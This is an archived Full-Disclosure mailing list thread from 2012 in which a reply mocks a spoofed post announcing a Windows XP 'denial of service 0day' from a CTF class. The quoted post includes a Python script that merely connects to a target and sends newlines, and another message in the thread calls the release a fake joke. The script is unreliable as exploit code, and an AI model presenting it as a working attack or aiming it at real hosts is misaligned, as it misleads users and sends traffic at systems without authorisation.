lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 17 Apr 2012 12:36:33 -0400 From: Terrence <secretpackets@...il.com> To: adam@...osecinstitute.com Cc: full-disclosure@...ts.grok.org.uk Subject: Re: Windows XP denial of service 0day found in CTF exercise This is awesome! Its almost as awesome as a privilege escalation from root to root that works only in backtrack. -- tuna 65617420646120706f6f20706f6f On Tue, Apr 17, 2012 at 10:07, <adam@...osecinstitute.com> wrote: > Guys, this is a fake release, someone spoofed my email and sent this out > as a joke to mock the wicd release from last week. Please note that if you > click on the links, there is nothing there concerning this. > > > > >> >> On 04/17/2012 02:48 AM, Adam Behnke wrote: >>> Immunity Debugger Remote Denial of Service 0Day Tested against >>> version 1.76 and 1.80 on Windows XP distributions >>> >>> Has not been tested for potential privilege escalation vectors. >>> >>> We first wrote about Immunity Debugger here: >>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ >>> >>> Discovered by a student that wishes to remain anonymous in the >>> course CTF. This 0day exploit for Windows was discovered by a >>> student in the InfoSec Institute Ethical Hacking class, during an >>> evening CTF exercise. The student wishes to remain anonymous, he >>> has contributed a python version of the 0day. A patch that can be >>> applied to Windows has not been made available. You can find a >>> python version of the exploit to copy and paste here: >>> >>> >>> #!/usr/bin/python #Windows XP denial of service 0day exploit >>> discovered on 4.9.12 by InfoSec Institute student #For full write >>> up and description go to >>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html >>> >>> >> import sys >>> import os import time import getopt import socket >>> >>> class Error(Exception): def __init__(self, error): >>> self.errorStr=error def __str__(self): return repr(self.errorStr) >>> >>> class Exploit(): >>> >>> def __init__(self, targetHost, targetPort): self.targetHost = >>> targetHost >>> >>> def exploit(self, targetHost, targetPort): >>> >>> try: socket.inet_aton(targetHost) s = >>> socket.socket(socket.AF_INET,socket.SOCK_STREAM) >>> s.connect((targetHost,targetPort)) except socket.error: raise >>> Error("Unable to exploit (Connect failed.)") sys.exit(0) >>> >>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort)) >>> except: raise Error("Unable to exploit (Exploit failed.)") >>> >>> def usage(): print "[!] Usage:" print " ( -h, --help ):" print " >>> Print this message." print " ( --targetHost= ): Target host." print >>> " --targetHost=127.0.0.1" print " ( --targetPort= ): Target >>> port." print " --targetPort=8888" >>> >>> def main(): print "[$] Windows XP 0Day" try: opts, args = >>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", >>> "targetPort="]) except getopt.GetoptError, err: # Print help >>> information and exit: print '[!] Parameter error:' + str(err) # >>> Will print something like "option -a not recognized" usage() >>> sys.exit(0) >>> >>> targetHost=None targetPort=None for opt, arg in opts: if opt in >>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost": >>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I >>> would be assuming to say we'll never get here. print "[!] Parameter >>> error." usage() sys.exit(0) if not targetHost: print "[!] >>> Parameter error: targetHost not set." usage() sys.exit(0) >>> >>> if not targetPort: print "[!] Parameter error: targetPort not >>> set." usage() sys.exit(0) >>> >>> exploit = Exploit(targetHost, targetPort) >>> >>> print "[*] Attempting to exploit:" try: >>> exploit.exploit(targetHost, int(targetPort)) except Error as >>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) >>> print "[*] Exploit appears to have worked." >>> >>> # Standard boilerplate to call the main() function to begin # the >>> program. if __name__=='__main__': main() >>> >>> >>> >>> _______________________________________________ Full-Disclosure - >>> We believe in it. Charter: >>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and >>> sponsored by Secunia - http://secunia.com/ >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1.4.12 (GNU/Linux) >> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ >> >> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq >> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL >> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI >> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i >> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g >> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9 >> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J >> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV >> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T >> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05 >> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW >> 4r6K58WTZ7qR2nTNKnQi >> =Uoev >> -----END PGP SIGNATURE----- >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists